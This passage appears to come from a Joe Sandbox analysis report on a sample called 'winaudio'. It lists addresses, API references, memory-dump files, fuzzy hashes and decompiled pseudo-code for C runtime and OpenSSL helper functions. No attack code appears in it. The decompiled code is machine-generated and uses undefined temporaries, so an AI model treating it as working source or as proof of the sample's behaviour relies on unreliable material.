                        0x00000000
                        0x0038f90f
                        0x0038f8e3
                        0x0038f8e5
                        0x0038f941
                        0x0038f945
                        0x0038f945
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038f87a
                        0x0038f87d
                        0x0038f880
                        0x0038f883
                        0x0038f886
                        0x0038f889
                        0x0038f88c
                        0x0038f88c
                        0x00000000
                        0x0038f849
                        0x0038f82b
                        0x0038f82b
                        0x0038f897
                        0x0038f899
                        0x00000000
                        0x0038f89e
                        0x0038f76d
                        0x0038f76d
                        0x0038f770
                        0x0038f779
                        0x0038f77c
                        0x0038f783
                        0x0038f785
                        0x0038f79e
                        0x0038f79f
                        0x0038f7a0
                        0x0038f7a2
                        0x0038f7a7
                        0x0038f787
                        0x0038f787
                        0x0038f78a
                        0x0038f78b
                        0x0038f78d
                        0x0038f78f
                        0x0038f791
                        0x0038f796
                        0x0038f796
                        0x0038f7aa
                        0x0038f7ac
                        0x0038f7ae
                        0x00000000
                        0x00000000
                        0x0038f7b4
                        0x0038f7b7
                        0x0038f7b9
                        0x0038f7bb
                        0x00000000
                        0x0038f7bd
                        0x0038f7bd
                        0x0038f7c0
                        0x00000000
                        0x0038f7c0
                        0x00000000
                        0x0038f7bb
                        0x0038f89f
                        0x0038f8a2
                        0x0038f8a7
                        0x00000000
                        0x0038f8aa
                        0x0038f73d
                        0x0038f73d
                        0x0038f744
                        0x0038f745
                        0x0038f747
                        0x0038f74c
                        0x0038f8ab
                        0x0038f8af
                        0x0038f8af
                        0x00000000

                        APIs
                        • _strpbrk.LIBCMT ref: 0038F77C
                          • Part of subcall function 0037F99E: IsProcessorFeaturePresent.KERNEL32(00000017,0037F970,00000016,0038B8CC,0000002C,003DF738,0038A481,?,?,?,0037F97D,00000000,00000000,00000000,00000000,00000000), ref: 0037F9A0
                          • Part of subcall function 0037F99E: GetCurrentProcess.KERNEL32(C0000417,0038B8CC,00000016,0038BDD9), ref: 0037F9C2
                          • Part of subcall function 0037F99E: TerminateProcess.KERNEL32(00000000), ref: 0037F9C9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_strpbrk
                        • String ID: *?$.
                        • API String ID: 4186436281-3972193922
                        • Opcode ID: 50269a21a19f94b8cff79ca2ea5ad93ff1f659ce1b3d8f2c63398e1a317f9c11
                        • Instruction ID: 3ce27cc4ab16af1cf505554002725e6d80bfc622d8ad2beec7225a809f687cd4
                        • Opcode Fuzzy Hash: 50269a21a19f94b8cff79ca2ea5ad93ff1f659ce1b3d8f2c63398e1a317f9c11
                        • Instruction Fuzzy Hash: 56519375E00209AFDF16EFA8C881AADBBF5EF58314F2581B9E954E7340E7359E018B50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002ECFE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E002ECFE0(signed int __edx, void* __esi, void* __ebp, signed int _a4) {
				signed int _v0;
				void* __ebx;
				signed int _t18;
				signed int _t20;
				void* _t24;
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				void* _t32;
				char _t34;
				intOrPtr _t35;
				signed int _t43;
				char* _t45;
				void* _t47;
				void* _t53;
				void* _t55;
				void* _t56;

				_t47 = __esi;
				_t43 = __edx;
				_t18 = 8;
				E00397C10();
				_t57 =  *0x3ed738;
				if( *0x3ed738 != 0) {
					L15:
					return _t18;
				}
				_push(_t32);
				 *0x3ed738 = 1;
				_t45 = E0038576C(_t32, __edx, _t57, "OPENSSL_ia32cap");
				_t55 = _t53 + 4;
				if(_t45 == 0) {
					_t20 = E002B1000(0x3f0a10);
					_t53 = _t55 + 4;
					_v0 = _t20;
					_a4 = _t43;
					L14:
					 *0x3f0a10 = _v0 | 0x00000400;
					_t18 = _a4;
					 *0x3f0a14 = _t18;
					goto L15;
				}
				_t34 =  *_t45;
				_push(_t47);
				_t37 = 0 | _t34 == 0x0000007e;
				_t48 = (_t34 == 0x7e) + _t45;
				_t24 = E002ED3F0((_t34 == 0x7e) + _t45, "%I64i",  &_v0);
				_t56 = _t55 + 0xc;
				if(_t24 == 0) {
					_t31 = E0038551C(_t37, _t48, _t24, _t24);
					_t56 = _t56 + 0xc;
					_v0 = _t31;
					_a4 = 0;
				}
				if(_t34 != 0x7e) {
					__eflags =  *_t45 - 0x3a;
					if( *_t45 != 0x3a) {
						L9:
						 *0x3f0a18 = 0;
						_t25 = E0037E8C0(_t45, 0x3a);
						_t53 = _t56 + 8;
						if(_t25 != 0) {
							_t35 =  *((intOrPtr*)(_t25 + 1));
							_t27 = E0038551C((0 | _t35 == 0x0000007e) + _t25 + 1, (0 | _t35 == 0x0000007e) + _t25 + 1, 0, 0);
							_t53 = _t53 + 0xc;
							if(_t35 != 0x7e) {
								 *0x3f0a18 = _t27;
							} else {
								 *0x3f0a18 =  *0x3f0a18 &  !_t27;
							}
						}
						goto L14;
					}
					_t29 = E002B1000(0x3f0a10);
					_t56 = _t56 + 4;
					L8:
					_a4 = _t43;
					_v0 = _t29;
					goto L9;
				}
				_t30 = E002B1000(0x3f0a10);
				_t56 = _t56 + 4;
				_t29 = _t30 &  !_v0;
				_t43 = _t43 &  !_a4;
				goto L8;
			}






















                        0x002ecfe0
                        0x002ecfe0
                        0x002ecfe0
                        0x002ecfe5
                        0x002ecfea
                        0x002ecff1
                        0x002ed10d
                        0x002ed110
                        0x002ed110
                        0x002ecff7
                        0x002ecffe
                        0x002ed00d
                        0x002ed00f
                        0x002ed014
                        0x002ed0e4
                        0x002ed0e9
                        0x002ed0ec
                        0x002ed0f0
                        0x002ed0f4
                        0x002ed0fd
                        0x002ed102
                        0x002ed107
                        0x00000000
                        0x002ed10c
                        0x002ed01a
                        0x002ed025
                        0x002ed026
                        0x002ed02f
                        0x002ed033
                        0x002ed038
                        0x002ed03d
                        0x002ed042
                        0x002ed047
                        0x002ed04a
                        0x002ed04e
                        0x002ed04e
                        0x002ed059
                        0x002ed07a
                        0x002ed07d
                        0x002ed094
                        0x002ed097
                        0x002ed0a1
                        0x002ed0a6
                        0x002ed0ac
                        0x002ed0ae
                        0x002ed0c1
                        0x002ed0c6
                        0x002ed0cc
                        0x002ed0d8
                        0x002ed0ce
                        0x002ed0d0
                        0x002ed0d0
                        0x002ed0cc
                        0x00000000
                        0x002ed0ac
                        0x002ed084
                        0x002ed089
                        0x002ed08c
                        0x002ed08c
                        0x002ed090
                        0x00000000
                        0x002ed090
                        0x002ed060
                        0x002ed069
                        0x002ed074
                        0x002ed076
                        0x00000000

                        APIs
                        • ___from_strstr_to_strchr.LIBCMT ref: 002ED0A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ___from_strstr_to_strchr
                        • String ID: %I64i$OPENSSL_ia32cap
                        • API String ID: 601868998-1470193844
                        • Opcode ID: 5aa5696b7a12ce68181f680b5dbc65e7b736fa9427e7b81b9821a2833c700c5a
                        • Instruction ID: 9be4e246ef377b2bff9c8c088facb5233d353b575f519ebe54b7e68b9979adb4
                        • Opcode Fuzzy Hash: 5aa5696b7a12ce68181f680b5dbc65e7b736fa9427e7b81b9821a2833c700c5a
                        • Instruction Fuzzy Hash: 40319BB0DA83C55FEB21DF25DC027AA37D4AB40354F484429F8499A282E7B98564CF93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DD730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E002DD730(intOrPtr* __ecx) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				signed int _t21;
				void* _t28;
				intOrPtr* _t29;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t39;
				signed int _t41;

				_t21 =  *0x3e1008; // 0x847b54ee
				_t22 = _t21 ^ _t41;
				 *[fs:0x0] =  &_v16;
				_t29 = __ecx;
				_v20 = __ecx;
				_t3 = _t29 + 4; // 0x4
				_t36 = _t3;
				 *__ecx = 0x3dd5b0;
				_v20 = _t36;
				 *_t36 = 0x3dce9c;
				 *((char*)(_t36 + 0xc)) = 0;
				 *((char*)(_t36 + 0xd)) = 0;
				 *((intOrPtr*)(_t36 + 4)) = 0;
				_v8 = 0;
				_t9 = _t36 + 0x10; // 0x14
				_t39 = _t9;
				 *_t36 = 0x3dcec8;
				_v24 = _t39;
				 *_t39 = 0;
				 *((intOrPtr*)(_t39 + 4)) = 0;
				 *_t39 = E002D2810(_t34, _t22, 0, 0);
				_t12 = _t36 + 0x1c; // 0x20
				 *((intOrPtr*)(_t36 + 0x18)) = 0x3dce7c;
				 *0x39e0b8(_t12, _t21 ^ _t41, _t35, _t38, _t28,  *[fs:0x0], 0x39cc08, 0xffffffff);
				 *_t36 = 0x3dd4e0;
				 *((intOrPtr*)(_t36 + 0x38)) = 0;
				 *((intOrPtr*)(_t36 + 0x3c)) = 0;
				 *((intOrPtr*)(_t36 + 0x40)) = 0;
				 *((intOrPtr*)(_t29 + 0x48)) = 0;
				 *((intOrPtr*)(_t29 + 0x4c)) = 0;
				 *[fs:0x0] = _v16;
				return _t29;
			}
















                        0x002dd747
                        0x002dd74c
                        0x002dd752
                        0x002dd758
                        0x002dd75a
                        0x002dd75d
                        0x002dd75d
                        0x002dd760
                        0x002dd766
                        0x002dd769
                        0x002dd76f
                        0x002dd773
                        0x002dd777
                        0x002dd77e
                        0x002dd785
                        0x002dd785
                        0x002dd78a
                        0x002dd792
                        0x002dd795
                        0x002dd79b
                        0x002dd7a7
                        0x002dd7a9
                        0x002dd7ad
                        0x002dd7b4
                        0x002dd7ba
                        0x002dd7c2
                        0x002dd7c9
                        0x002dd7d0
                        0x002dd7d7
                        0x002dd7de
                        0x002dd7e8
                        0x002dd7f6

                        APIs
                          • Part of subcall function 002D2810: new.LIBCMT ref: 002D2815
                        • RtlInitializeCriticalSection.NTDLL(00000020), ref: 002DD7B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CriticalInitializeSection
                        • String ID: @!-$ -
                        • API String ID: 32694325-3445125451
                        • Opcode ID: fd841f049c8d06781fbda108090feb0028a1aeb1f03fea0372174ae2850e7bf3
                        • Instruction ID: 4df7dbd017d16d20d5257726133a48aa4b27d8cdf71ccf429d0b6f84192f7f0b
                        • Opcode Fuzzy Hash: fd841f049c8d06781fbda108090feb0028a1aeb1f03fea0372174ae2850e7bf3
                        • Instruction Fuzzy Hash: F62164B2510606EFDB12CF49D884786FBF8FB04314F10861AE5189BB80D3B6A818CFD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DD8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E0038DD8B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				void* _t30;
				intOrPtr* _t32;
				void* _t33;
				signed int _t34;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x3e1008; // 0x847b54ee
				_v8 = _t18 ^ _t34;
				_t32 = E0038D93C(0x16, "LCMapStringEx", 0x3d0034, "LCMapStringEx");
				if(_t32 == 0) {
					LCMapStringW(E0038DE13(_t26, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x39e280(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t32();
				}
				_pop(_t33);
				return E002E056D(_v8 ^ _t34, _t30, _t33);
			}










                        0x0038dd8b
                        0x0038dd90
                        0x0038dd91
                        0x0038dd98
                        0x0038ddb2
                        0x0038ddb9
                        0x0038ddfc
                        0x0038ddbb
                        0x0038ddd8
                        0x0038ddde
                        0x0038ddde
                        0x0038de07
                        0x0038de10

                        APIs
                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,6DE85006,00000001,?,0038199F), ref: 0038DDFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: String
                        • String ID: LCMapStringEx$"-
                        • API String ID: 2568140703-773153635
                        • Opcode ID: 03e03a3eb6fcbc28f14523dd931ea091901b1dee3ab4606b3db517444efc1094
                        • Instruction ID: 6e1cf5dabd0dc828c10e79a5e8aace19b519083d95f0e5f15177e19a93cc0be3
                        • Opcode Fuzzy Hash: 03e03a3eb6fcbc28f14523dd931ea091901b1dee3ab4606b3db517444efc1094
                        • Instruction Fuzzy Hash: ED011732540209BBCF17AF90DC01EEE3F66FF08750F404155FA04691A1C6729971EB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DAA1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 24%
                        			E0038DAA1(void* __ecx, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				void* _t30;
				intOrPtr* _t32;
				void* _t33;
				signed int _t34;

				_push(__ecx);
				_t18 =  *0x3e1008; // 0x847b54ee
				_v8 = _t18 ^ _t34;
				_t32 = E0038D922();
				if(_t32 == 0) {
					CompareStringW(E0038DE13(__ecx, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x39e280(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t32();
				}
				_pop(_t33);
				return E002E056D(_v8 ^ _t34, _t30, _t33);
			}










                        0x0038daa6
                        0x0038daa7
                        0x0038daae
                        0x0038dab7
                        0x0038dabb
                        0x0038dafe
                        0x0038dabd
                        0x0038dada
                        0x0038dae0
                        0x0038dae0
                        0x0038db09
                        0x0038db12

                        APIs
                        • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,FZ9,003959E5,?,?,00000000,?), ref: 0038DAFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CompareString
                        • String ID: FZ9$"-
                        • API String ID: 1825529933-4007616344
                        • Opcode ID: 84a663bf1dac33b2e374e9a005ba2f43b114b1fb25cb67a416f69657383be2f8
                        • Instruction ID: 567c78368b0bbfd1507e44f249af3f4bb73cc135c982e02cba64be5a53c8b783
                        • Opcode Fuzzy Hash: 84a663bf1dac33b2e374e9a005ba2f43b114b1fb25cb67a416f69657383be2f8
                        • Instruction Fuzzy Hash: E801C032500209BBCF13AF90EC01DAE7F6AFF08760F054555FA146A160CB32D971EB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DD29 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0038DD74
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CountCriticalInitializeSectionSpin
                        • String ID: InitializeCriticalSectionEx$"-
                        • API String ID: 2593887523-4082723255
                        • Opcode ID: a8f05b1b5b5bced51629aa627a8dcf1a4636d93d0d94d2171d6fef5383e1ad9a
                        • Instruction ID: 5ff077d207ac63fb0f69e098ef783058b1b997494641fea4004e66fccd1191ba
                        • Opcode Fuzzy Hash: a8f05b1b5b5bced51629aa627a8dcf1a4636d93d0d94d2171d6fef5383e1ad9a
                        • Instruction Fuzzy Hash: ABF0B431A40208BBCF27BF61DC05EAE7F65EF04B10F404056FC095A2A0CA724D109B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DB15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Alloc
                        • String ID: FlsAlloc$"-
                        • API String ID: 2773662609-650215387
                        • Opcode ID: 199789eac495359346cf39b4f61384fd8eeddef01a9889be6fe415cd96a56ea1
                        • Instruction ID: 0311bf61b8457d8182c3d32b9b634415cbee71a35d4013f8ed758e700bb941cc
                        • Opcode Fuzzy Hash: 199789eac495359346cf39b4f61384fd8eeddef01a9889be6fe415cd96a56ea1
                        • Instruction Fuzzy Hash: 4BE0E530A40318AB8713BB51DC02EAE7B68EB45F20F4105ADF80597291CA714D118795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DB6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Free
                        • String ID: FlsFree$"-
                        • API String ID: 3978063606-145977938
                        • Opcode ID: 1d909072342ffacc7bc410bb3f07f47793fac9f17e3a2710cd11f8b0984cd831
                        • Instruction ID: e7033fca373f3611a3e503556c0fa33b356622b869de6f46f5378fe5ea56d68f
                        • Opcode Fuzzy Hash: 1d909072342ffacc7bc410bb3f07f47793fac9f17e3a2710cd11f8b0984cd831
                        • Instruction Fuzzy Hash: 1AE0E531A41218ABC713BF519C06E7EBB58DB46F10F4101AEFC059B281CE724D108BD5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038DCD3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(00000000,00383848), ref: 0038DD12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID: GetSystemTimePreciseAsFileTime$"-
                        • API String ID: 2086374402-3188030383
                        • Opcode ID: 8066d67e583d7599188de17f235cc512635b2810033395306a4ccd7a9f49f3ac
                        • Instruction ID: 8417ef211e569ab90df34a1302f1542e62931f0c79323353f39312134d410b32
                        • Opcode Fuzzy Hash: 8066d67e583d7599188de17f235cc512635b2810033395306a4ccd7a9f49f3ac
                        • Instruction Fuzzy Hash: F7E0A032A40218B7CB26BB54AC02F6EBB58EF44F10F4005AAF8055B281DA715D149AD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002E0540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E002E0540(intOrPtr _a4) {
				char _v16;
				intOrPtr _t8;
				char* _t10;

				_t10 =  &_v16;
				E002E04B5(_t10, _a4);
				E0037DF39( &_v16, 0x3df1c8);
				asm("int3");
				_t8 =  *((intOrPtr*)(_t10 + 4));
				if(_t8 == 0) {
					return "Unknown exception";
				}
				return _t8;
			}






                        0x002e0546
                        0x002e054c
                        0x002e055a
                        0x002e055f
                        0x002e0560
                        0x002e0565
                        0x00000000
                        0x002e0567
                        0x002e056c

                        APIs
                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 002E054C
                          • Part of subcall function 002E04B5: std::exception::exception.LIBCONCRT ref: 002E04C2
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002E055A
                          • Part of subcall function 0037DF39: RaiseException.KERNEL32(?,?,002E053F,?,?,?,?,?,?,?,?,002E053F,?,003DF18C,?), ref: 0037DF98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                        • String ID: Unknown exception
                        • API String ID: 1586462112-410509341
                        • Opcode ID: 34e377ea23a2bbbf18cb790e998d27c68e347fbac87363edda5917d77de52897
                        • Instruction ID: 7b6e57ea76de3d9380df35e8c2e6e95fe2b35265e2a2e45056a9968c540bb9b7
                        • Opcode Fuzzy Hash: 34e377ea23a2bbbf18cb790e998d27c68e347fbac87363edda5917d77de52897
                        • Instruction Fuzzy Hash: 99D05E38A0020867CB01EEA5D886998B7786E00700BC08061F90486141E7A4E9168E80
                        Uniqueness

                        Uniqueness Score: -1.00%